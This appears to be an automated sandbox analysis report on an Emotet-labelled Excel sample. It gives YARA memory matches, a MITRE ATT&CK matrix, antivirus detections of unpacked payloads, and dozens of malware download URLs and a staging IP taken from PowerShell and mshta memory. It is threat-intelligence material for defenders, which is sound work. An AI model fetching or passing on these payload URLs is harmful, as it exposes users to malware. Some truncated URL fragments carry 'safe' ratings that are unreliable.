Source: Yara match	File source: 0000000F.00000002.657039086.0000000002BE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.677470138.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.603206578.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656328643.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.659295124.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.603148203.0000000003071000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656913547.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548336620.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656273898.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.658858543.00000000002E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547596070.00000000007F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602465410.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548156511.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602135379.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602581342.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548385196.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602649396.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.549722399.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.657011784.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.657099652.0000000003050000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.657195935.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547739583.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.605845584.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547820098.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.603002835.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.677639704.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656380451.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656726745.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602710616.0000000002930000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602062854.00000000006D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496880032.0000000000770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548085066.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548199162.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.605017420.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602269654.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602677407.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602340992.00000000020A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602833934.0000000002E01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.602929583.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.658681536.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.549782146.0000000000641000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\JooSee.dll, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	1 Windows Service	1 Windows Service	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	13 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	21 Scripting	Security Account Manager	38 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	21 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	122 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Service Execution	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1162545482187818.xls	12%	Virustotal		Browse
1162545482187818.xls	19%	ReversingLabs	Document-Excel.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\JooSee.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.rundll32.exe.340000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3150000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.340000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.220000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.260000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.b80000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2e30000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.500000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.20d0000.5.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
16.2.rundll32.exe.2e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.3070000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.4e0000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
14.2.rundll32.exe.250000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.22a0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.3050000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.rundll32.exe.2740000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.28d0000.7.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2bb0000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.rundll32.exe.2900000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.380000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.2e60000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.bf0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.rundll32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.rundll32.exe.700000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
14.2.rundll32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.rundll32.exe.770000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.b50000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2f40000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.2e00000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.7e0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2be0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2770000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.870000.3.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3120000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
16.2.rundll32.exe.140000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.290000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.3080000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.23e0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2320000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.2930000.9.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.530000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.300000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.28d0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.25b0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2f10000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.rundll32.exe.20a0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.7f0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.2e30000.11.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
11.2.rundll32.exe.640000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.6d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.7a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

Source	Detection	Scanner	Label	Link
hostfeeling.com	11%	Virustotal		Browse
jurnalpjf.lan.go.id	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://maxtdeveloper.com/okw9yx/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	13%	Virustotal		Browse
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	100%	Avira URL Cloud	malware
http://it-o.biz/bitrix/xoDdDe/PE3	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/f	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	100%	Avira URL Cloud	malware
http://www.protware.com/ll	0%	Avira URL Cloud	safe
https://property-eg.com/mlzkir/97v/	100%	Avira URL Cloud	malware
http://91.240.11	0%	URL Reputation	safe
http://91.240.118.172/gg/ff/fe.png	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.pngPE3	0%	Avira URL Cloud	safe
http://www.protware.com/	0%	URL Reputation	safe
http://jurnalpjf.lan.go.id/asset	0%	Avira URL Cloud	safe
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-adm	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	0%	Avira URL Cloud	safe
http://www.piriform.co	0%	Avira URL Cloud	safe
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	100%	Avira URL Cloud	malware
http://hostfeeling.com	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com	100%	Avira URL Cloud	malware
http://it-o.biz/	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id/assets/iM/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp	0%	Avira URL Cloud	safe
http://daisy.suk	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlngs	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlmshta	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlWinSta0	0%	Avira URL Cloud	safe
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/97v/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlpare	0%	Avira URL Cloud	safe
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/9	100%	Avira URL Cloud	malware
http://91.240.118.172	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id	0%	Avira URL Cloud	safe
http://www.protware.com	0%	URL Reputation	safe
http://activetraining.sytes.net/libraries/8s/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlfunction	0%	Avira URL Cloud	safe
http://totalplaytuxtla.com/sitio	0%	Avira URL Cloud	safe
http://maxtdeveloper.com/okw9yx/Gc28ZX/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlN	0%	Avira URL Cloud	safe
http://it-o.biz/bitrix/xoDdDe/	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/libraries/8s/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.p	0%	Avira URL Cloud	safe
http://gardeningfilm.com/wp-cont	100%	Avira URL Cloud	malware
http://jurnalpjf.lan.go.id/assets/iM/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlB	0%	Avira URL Cloud	safe
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-admin/G1pYGL/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlE	0%	Avira URL Cloud	safe
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.html	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hostfeeling.com	164.90.147.135	true	true	11%, Virustotal, Browse	unknown
jurnalpjf.lan.go.id	103.206.244.105	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.240.118.172/gg/ff/fe.png	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.html	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://maxtdeveloper.com/okw9yx/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://it-o.biz/bitrix/xoDdDe/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/f	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.protware.com/ll	mshta.exe, 00000004.00000003.419104766.000000000382A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440201551.0000000003842000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.444442835.0000000003843000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438907456.0000000003830000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419197322.000000000382F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441682969.0000000003843000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-eg.com/mlzkir/97v/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.11	powershell.exe, 00000006.00000002.682406030.00000000036EE000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	low
http://91.240.118.172/gg/ff/fe.pngPE3	powershell.exe, 00000006.00000002.682406030.00000000036EE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.protware.com/	mshta.exe, 00000004.00000003.419223300.000000000385B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441530130.000000000385B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.444503795.00000000043BB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.439111877.000000000385B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.444449086.000000000385B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://jurnalpjf.lan.go.id/asset	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-adm	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	mshta.exe, 00000004.00000003.420929824.0000000002B25000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.piriform.co	powershell.exe, 00000006.00000002.677258344.0000000000420000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://activetraining.sytes.net/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp-content/GG01c/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://daisy.suk	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlngs	mshta.exe, 00000004.00000002.443959880.00000000003CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlmshta	mshta.exe, 00000004.00000002.443937877.0000000000390000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlWinSta0	mshta.exe, 00000004.00000002.443937877.0000000000390000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/97v/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlpare	mshta.exe, 00000004.00000002.444318113.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441581159.00000000037C0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/9	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.682406030.00000000036EE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://jurnalpjf.lan.go.id	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.protware.com	mshta.exe, 00000004.00000003.438303238.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.439111877.000000000385B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.444449086.000000000385B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.444043858.0000000000443000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://activetraining.sytes.net/libraries/8s/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlfunction	mshta.exe, 00000004.00000003.421313830.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://totalplaytuxtla.com/sitio	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlN	mshta.exe, 00000004.00000002.444092914.00000000004C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://it-o.biz/bitrix/xoDdDe/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp-content/GG01c/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://activetraining.sytes.net/libraries/8s/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.p	powershell.exe, 00000006.00000002.682406030.00000000036EE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gardeningfilm.com/wp-cont	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
